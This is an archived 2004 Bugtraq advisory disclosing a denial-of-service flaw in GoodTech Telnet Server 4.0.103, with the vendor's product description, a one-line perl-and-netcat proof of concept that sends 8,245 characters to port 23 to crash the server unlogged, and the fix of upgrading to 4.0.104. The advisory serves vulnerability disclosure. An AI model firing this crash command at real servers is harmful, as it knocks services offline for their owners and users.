DoS in GoodTech Telnet Server 4.0.103

From: Donato Ferrante (fdonato_at_autistici.org)
Date: 01/02/04

  • Next message: c0wboy_at_0x333: "xsok local games exploit" 
    To: <bugtraq@securityfocus.com>
Date: Fri, 2 Jan 2004 12:05:10 +0100

                               Donato Ferrante

    Application: GoodTech Systems Telnet Server for Windows NT/2000/XP
                  http://www.goodtechsys.com/

    Version: 4.0.103

    Bug: Denial of Service

    Author: Donato Ferrante
                  e-mail: fdonato@autistici.org
                  web: www.autistici.org/fdonato

    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    1. Description
    2. The bug
    3. The code
    4. The fix

    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    ----------------
    1. Description:
    ----------------

    Vendor's Description:

    "The product turns a Windows NT/2000/XP system into a multi-user
    Telnet server. Gives Telnet users full access to Windows NT command
    line. Telnet users can run a variety of character-based applications.
    Accepts any telnet connection from any client (Unix, NT, 2000, 95,
    98, Me, any wireless handheld, etc.) right out of the box. Features
    include support for both line mode (with scroll buffer) and screen
    mode, local printing on the client side, connection restriction based
    on Host or IP address, connection restriction based on number of
    users, etc."

    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    ------------
    2. The bug:
    ------------

    The program, doesn't make a good check on the strings passed as input,
    so is possible to send a big string in input and the telnet server
    will crash without warnings.

    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    -------------
    3. The code:
    -------------

    To test the vulnerability simply send a big string to the telnet server,

                   perl -e 'print "a"x8245' | nc server 23

    or generally a string like:

                        aaaa[..a..]aa ( 8245 of a )

    so the telnet server will go down.
    Note: no errors will be reported in the logfile of the server.

    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

    ------------
    4. The fix:
    ------------

    To fix the bug simply go on the GoodTech Systems' official website,
    http://www.goodtechsys.com/, and download the latest version 4.0.104
    of GoodTech Systems Telnet Server for Windows NT/2000/XP.

    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

  • Next message: c0wboy_at_0x333: "xsok local games exploit"